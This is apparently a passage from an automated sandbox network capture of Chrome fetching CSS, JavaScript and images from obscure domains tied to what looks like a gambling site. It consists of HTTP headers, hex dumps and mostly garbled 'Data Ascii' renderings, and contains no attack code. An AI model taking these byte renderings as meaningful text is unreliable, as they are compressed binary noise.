                                                                                                                                                          2024-06-09 22:40:54 UTC797INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 5b 4f d4 40 14 7e ef af 18 9b 0d ed c2 d2 35 31 f1 61 09 51 2e 2f 98 00 26 e0 93 31 64 b6 9d dd 2d f4 96 e9 94 4b 48 13 45 d1 0d 9a 80 09 8a 97 08 91 f8 60 8c c1 35 26 c8 65 f9 37 b4 85 27 ff 82 33 bd ec b6 cb 8a 3e f0 e0 79 99 ed 39 df 9c f3 f5 9c 6f a6 5b 71 0c 99 a8 a6 01 c6 a7 54 82 ee 9a d6 3d 4b cc 83 65 97 e3 da 0e c9 c2 26 31 c9 92 85 c0 20 58 e6 38 40 4d 51 a1 66 56 47 a0 a6 0d 43 79 ae 04 2a 49 1e 51 81 04 d2 0c 21 8a d9 3c c4 80 f9 26 cb b3 74 7b 4e b2 20 b6 d1 9d a9 c9 89 08 39 d0 02 ca a6 61 9b 1a 92 54 a3 62 8a fc d9 de ee f9 9b d5 e0 fb b1 b7 fd fc f4 e0 88 07 7d 49 16 c9 76 ca b6 8c d5 32 9a 66 94 fa 00 1f bc 7b 12 c3 57 0e fd cd 7d af de f0 f7 eb fe a3 6f bf 9a 2f fc fa 86 b7 b6 73 d6 78 1c 6c 7e f6 de
                                                                                                                                                          Data Ascii: V[O@~51aQ./&1d-KHE`5&e7'3>y9o[qT=Ke&1 X8@MQfVGCy*IQ!<&t{N 9aTb}Iv2f{W}o/sxl~


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          134192.168.2.54988123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC362OUTGET /cc.png?r=6084701866 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:54 UTC573INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:54 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[190],EU-GER-frankfurt-EDGE4-CACHE2[15,TCP_MISS,190],EU-FRA-paris-GLOBAL1-CACHE30[6],EU-FRA-paris-GLOBAL1-CACHE7[0,TCP_HIT,0],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 7936ce5cdbf50cb93c343098173c4a40
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:54 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          135192.168.2.549877183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC559OUTGET /ftl/commonPage/themes/gui-base.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:55 UTC653INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-210-30
                                                                                                                                                          ETag: W/"661623eb-14596"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:54 GMT
                                                                                                                                                          Last-Modified: Wed, 10 Apr 2024 05:30:19 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:54 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp210:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XY-MP-210-30
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-02
                                                                                                                                                          X-Cdn-Request-ID: 64707c49809a1f9f41e51e4e02937e13
                                                                                                                                                          2024-06-09 22:40:55 UTC15731INData Raw: 33 30 38 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 7d 79 93 e4 c6 75 e7 ff fa 14 50 33 18 9c 21 ab 8a 00 ea ee 0a 4e 88 94 ad 23 2c d9 5e 51 d6 1e 14 83 81 02 b2 ba c0 41 01 25 00 d5 07 3b ca a1 f0 5a 22 ad b5 0e cb b2 b4 3a bc a2 7c 2d ad 90 e4 db 26 45 4a fe 32 ec 99 e1 5f fe 0a ce 1b 79 bc 44 a1 7a 64 ef 76 93 d3 55 99 bf 7c f9 f2 bd 97 2f ef cc 67 9f fe f0 87 bc a7 bd 8f 47 1b f4 42 71 f9 3b 9f ec bf 10 55 c8 bb 73 f3 c3 9f 3f fc d1 17 3f f8 9f 6f dd bc f1 e5 bb 04 70 8e ca 2a 2d 72 2f 18 f8 83 39 09 78 7e 57 af 8b f2 d4 7b b1 46 e7 28 27 21 bf 16 d5 c8 db 14 49 ba 4a 51 e2 85 7e 30 ed fb f3 be 1f e2 b8 67 3f f4 ec d3 de c3 9f ff d9 cd 1f 7e e9 c1 9b ff 72 f3 de d7 49 d0 47 d2 cd b6 28 6b 6f 57 66 77 4e d6 45 7e b6 8c 8a 41 5c 55 27 77 17 04 7e f3 a5
                                                                                                                                                          Data Ascii: 308b}yuP3!N#,^QA%;Z":|-&EJ2_yDzdvU|/gGBq;Us??op*-r/9x~W{F('!IJQ~0g?~rIG(koWfwNE~A\U'w~
                                                                                                                                                          2024-06-09 22:40:55 UTC1408INData Raw: 9f c9 87 6e 15 64 fc ff 1f 9d e3 6d f5 6a 08 e6 3f 4b a9 d8 81 fa d6 e0 05 bb 5d e6 75 57 78 e0 bb 7e f0 f5 6f be ff ee 3f 3f f8 fa 37 3e f8 f2 37 ff ed bd ef 11 b7 cb fa 24 fd 3a dd ea be d6 f7 e7 2b b4 92 1e 7f 48 6e ac 50 fa 41 0b 55 11 ea d0 93 21 d5 de 05 3f 98 ad dd 89 42 5b 05 45 5e a4 c0 0d 27 83 28 c3 7e 4d ba 2a df d3 a3 95 0b 46 9a ab 45 3c be b5 47 87 7a 5b 68 2c 00 0f 6f f4 84 03 fc 8f b4 96 db 12 89 14 7b 55 07 37 6a a7 85 ca ab 25 6f fa 85 ec fc 82 da 19 ae 91 c9 58 1d 93 8d e8 37 6a 6f 64 12 53 f4 b3 fb 2c 5c cc 4c 10 35 fa 52 8d e4 b3 35 f0 75 b0 24 8e 8f 48 c6 ec 51 b0 9a 92 ed e2 b1 6d 84 1a e7 fb bf f8 e3 47 bf f7 f7 78 40 83 07 20 1f 7c f1 f7 6e 7e fe 2d 62 94 15 a9 07 55 9f 54 c2 27 e4 60 c7 18 06 dd 13 28 3a 4c 6a 78 f0 e8 46 b4 85
                                                                                                                                                          Data Ascii: ndmj?K]uWx~o??7>7$:+HnPAU!?B[E^'(~M*FE<Gz[h,o{U7j%oX7jodS,\L5R5u$HQmGx@ |n~-bUT'`(:LjxF


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          136192.168.2.549878183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC567OUTGET /ftl/commonPage/themes/gui-skin-default.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:54 UTC686INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 6253
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-116-29
                                                                                                                                                          ETag: W/"64ad1569-7b6e"
                                                                                                                                                          Date: Thu, 06 Jun 2024 22:03:25 GMT
                                                                                                                                                          Last-Modified: Tue, 11 Jul 2023 08:40:09 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 22:03:25 GMT
                                                                                                                                                          Age: 261449
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;yancmp116:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-YANC-MP-116-29
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-27
                                                                                                                                                          X-Cdn-Request-ID: 6325c39f4236d45f0378661e3a1e970f
                                                                                                                                                          2024-06-09 22:40:54 UTC6253INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 3d 6b 8f 1c c7 71 df f5 2b c6 14 08 de f1 6e 96 b3 cf bb dd 05 0f 3e 92 47 8a 72 68 4b 7c 58 24 65 7d 98 9d e9 dd 1d 71 76 66 31 33 cb bb e3 e2 00 05 49 04 2b 8e f3 70 92 0f 81 23 20 8c 11 c3 5f ec 0f 09 02 24 91 6d fd 97 c0 a4 c4 4f fe 0b e9 e7 4c 3f 6a 1e 7b 52 00 11 d0 1d a5 9b ed ae ae ae aa ae ae ae ae ae e9 fd e3 67 9f 5f b9 fc 9d 37 ac cb d6 2d 77 81 ae c5 27 0f 6e db f7 9e 04 91 7d 03 4d dd 55 98 59 5b af 7e f1 d7 2f ff e5 b7 af fe ec 57 2f 7e fc f1 1f 7f fb c9 ff 7e f4 0f f8 df 17 ff f4 bb 2f 3f f9 f7 2f fe e3 33 56 4b da 3f 45 49 1a c4 91 d5 6e 39 ad 21 29 38 5c 65 f3 38 19 59 f7 32 f4 14 45 a4 e4 86 9b 21 6b 11 fb c1 34 40 be d5 71 da 7b b6 33 b4 3b 6d 5c 77 85 50 71 35 ff b1 fc 24 5e fa f1 71 94 5a 7f f8 af 9f
                                                                                                                                                          Data Ascii: =kq+n>GrhK|X$e}qvf13I+p# _$mOL?j{Rg_7-w'n}MUY[~/W/~~/?/3VK?EIn9!)8\e8Y2E!k4@q{3;m\wPq5$^qZ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          137192.168.2.549879183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC561OUTGET /ftl/bwin1768/themes/style/common.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:54 UTC676INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 49170
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-TZ-MP-23-11
                                                                                                                                                          ETag: "659cb83c-c012"
                                                                                                                                                          Date: Fri, 07 Jun 2024 01:55:18 GMT
                                                                                                                                                          Last-Modified: Tue, 09 Jan 2024 03:06:36 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 01:55:18 GMT
                                                                                                                                                          Age: 247536
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;tzmp23:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-TZ-MP-23-11
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-30
                                                                                                                                                          X-Cdn-Request-ID: 4549b5fd7c01b2372e4e9a9113f726a2
                                                                                                                                                          2024-06-09 22:40:54 UTC15708INData Raw: ef bb bf 2f 2a 20 e7 a6 81 e7 94 a8 e5 93 8d e5 ba 94 20 2a 2f 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 30 70 78 29 7b 0a 09 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 34 30 70 78 3b 7d 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 0a 09 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 34 30 70 78 3b 7d 0a 7d 0a 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 32 30 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 0a 0a 61 2c 20 61 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0a 0a 2f 2a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20
                                                                                                                                                          Data Ascii: /* */@media (min-width:990px){.container{width:1040px;}}@media (min-width:1200px){.container{width:1040px;}}.container{width:1200px !important;margin:0 auto;padding:0;}a, a:hover {text-decoration: none;}/*====================
                                                                                                                                                          2024-06-09 22:40:54 UTC16384INData Raw: 69 6e 2d 73 70 6f 72 74 73 20 2e 61 70 69 2d 74 61 62 73 3e 6c 69 3e 61 3a 6c 69 6e 6b 2c 20 2e 61 70 69 2d 74 61 62 73 3e 6c 69 3e 61 3a 76 69 73 69 74 65 64 2c 20 2e 61 70 69 2d 74 61 62 73 3e 2e 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3e 61 7b 63 6f 6c 6f 72 3a 72 67 62 28 31 32 36 2c 20 31 34 36 2c 20 31 38 39 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 2e 73 70 6f 72 74 73 20 2e 70 75 62 6c 69 63 5f 73 74 79 6c 65 7b 68 65 69 67 68 74 3a 20 38 32 35 70 78 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 31 30 30 25 20 31 30 30 25 3b 7d 0a 2e 73 70 6f 72 74 73 20 2e 70 75 62 6c 69 63 5f 73 74 79 6c 65 20 2e 70 6c 61 74 65 5f 6f 6e 65 20 2e 70 6c 61 74 65 5f 6f 6e 65 5f 73 75 62 73 65 74 20 2e 61 70 69 5f 74
                                                                                                                                                          Data Ascii: in-sports .api-tabs>li>a:link, .api-tabs>li>a:visited, .api-tabs>.disabled:hover>a{color:rgb(126, 146, 189) !important;}.sports .public_style{height: 825px;width: 100%;background-size: 100% 100%;}.sports .public_style .plate_one .plate_one_subset .api_t
                                                                                                                                                          2024-06-09 22:40:55 UTC16384INData Raw: 72 61 6e 73 69 74 69 6f 6e 3a 20 2e 33 73 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 7d 0a 66 6f 6f 74 65 72 20 2e 66 6f 6f 74 65 72 2d 6d 69 64 64 6c 65 20 2e 73 70 6f 72 74 2d 70 61 72 74 6e 65 72 20 64 69 76 3a 68 6f 76 65 72 20 73 70 61 6e 7b 63 6f 6c 6f 72 3a 20 23 66 66 66 7d 0a 0a 66 6f 6f 74 65 72 20 2e 66 6f 6f 74 65 72 2d 61 62 6f 75 74 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 0a 66 6f 6f 74 65 72 20 2e 66 6f 6f 74 65 72 2d 61 62 6f 75 74 20 6c 69 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 20 27 7c 27 3b 63 6f 6c 6f 72 3a 20 23 64
                                                                                                                                                          Data Ascii: ransition: .3s;font-size: 16px;}footer .footer-middle .sport-partner div:hover span{color: #fff}footer .footer-about{display: flex;justify-content: center;flex-direction: column;align-items: center;}footer .footer-about li:after{content: '|';color: #d
                                                                                                                                                          2024-06-09 22:40:55 UTC694INData Raw: 74 7b 6d 61 72 67 69 6e 3a 20 30 20 34 30 70 78 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6a 75 73 74 69 66 79 3b 7d 0a 2e 69 6e 64 65 78 2d 73 63 72 65 65 6e 2d 30 33 20 2e 69 74 65 6d 34 2d 69 6d 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 20 33 30 30 70 78 3b 68 65 69 67 68 74 3a 20 33 37 39 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 31 30 30 25 20 31 30 30 25 3b 7d 0a 2e 69 6e 64 65 78 2d 73 63 72 65 65 6e 2d 30 33 20 2e 69 74 65 6d 34 2d 74 65 78 74 7b 6d 61 72 67 69 6e 3a 20 30 20 34
                                                                                                                                                          Data Ascii: t{margin: 0 40px;color: #fff;font-size: 16px;font-weight: 400;line-height: 25px;text-align: justify;}.index-screen-03 .item4-img{background-repeat: no-repeat;width: 300px;height: 379px;background-size: 100% 100%;}.index-screen-03 .item4-text{margin: 0 4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          138192.168.2.549880183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC541OUTGET /ftl/commonPage/js/lazyload.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:54 UTC705INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 2731
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-04-14
                                                                                                                                                          ETag: W/"64d05f66-2f79"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:04:58 GMT
                                                                                                                                                          Last-Modified: Mon, 07 Aug 2023 03:05:10 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:04:58 GMT
                                                                                                                                                          Age: 297356
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;xymp04:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-04-14
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-25
                                                                                                                                                          X-Cdn-Request-ID: 2c495235eb9969e264271310ef04daac
                                                                                                                                                          2024-06-09 22:40:54 UTC2731INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5a 6f 8f db 48 19 7f bf 9f 62 1a ad 1a a7 9b b5 d3 8a 72 dc 86 bd a3 77 57 d0 a2 2d 85 6b 0b 2f 96 05 79 ed 49 e2 d6 f1 98 f1 b8 69 e8 e5 1d 82 de 49 85 43 9c 7a e8 5e 21 71 02 84 44 8b 84 04 12 a2 c7 97 69 7a f0 2d 78 9e 99 b1 3d 76 9c c4 d9 6e 7b f7 82 51 d5 75 66 9e f9 cd f3 7f 9e f1 d8 b9 70 6e 8b 5c 20 87 ee 4f a7 e4 90 b9 3e d9 25 df 76 ef ba 37 3c 1e c4 82 c4 61 3a 0c 22 32 60 9c 84 48 11 02 45 10 0d 49 30 76 87 34 81 89 38 f7 6d 16 4f 79 30 1c 09 62 79 1d 72 a9 d7 7b 6d f7 52 ef e2 eb e4 5a 70 c7 25 37 d3 34 66 a1 ab 49 0f 03 8f 46 09 f5 49 1a f9 94 13 31 a2 e4 da c1 4d 12 aa ee 3d 24 21 64 24 44 bc e7 38 93 c9 c4 66 31 f4 b3 94 7b d4 66 7c e8 68 ba c4 19 07 62 57 ff b0 e3 51 ac d1 bf cb d9 6d ea 09 32 62 63 13 2b
                                                                                                                                                          Data Ascii: ZoHbrwW-k/yIiICz^!qDiz-x=vn{Qufpn\ O>%v7<a:"2`HEI0v48mOy0byr{mRZp%74fIFI1M=$!d$D8f1{f|hbWQm2bc+


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          139192.168.2.54988290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:54 UTC635OUTGET /pc/image-pc/video/mg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:54 UTC634INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:54 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15721
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d69"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE11[408],EU-GER-frankfurt-GLOBAL1-CACHE12[401,TCP_MISS,404],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ef1811c3694428b2088a55dd5fde2426
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814483
                                                                                                                                                          X-CCDN-Expires: 2464137
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
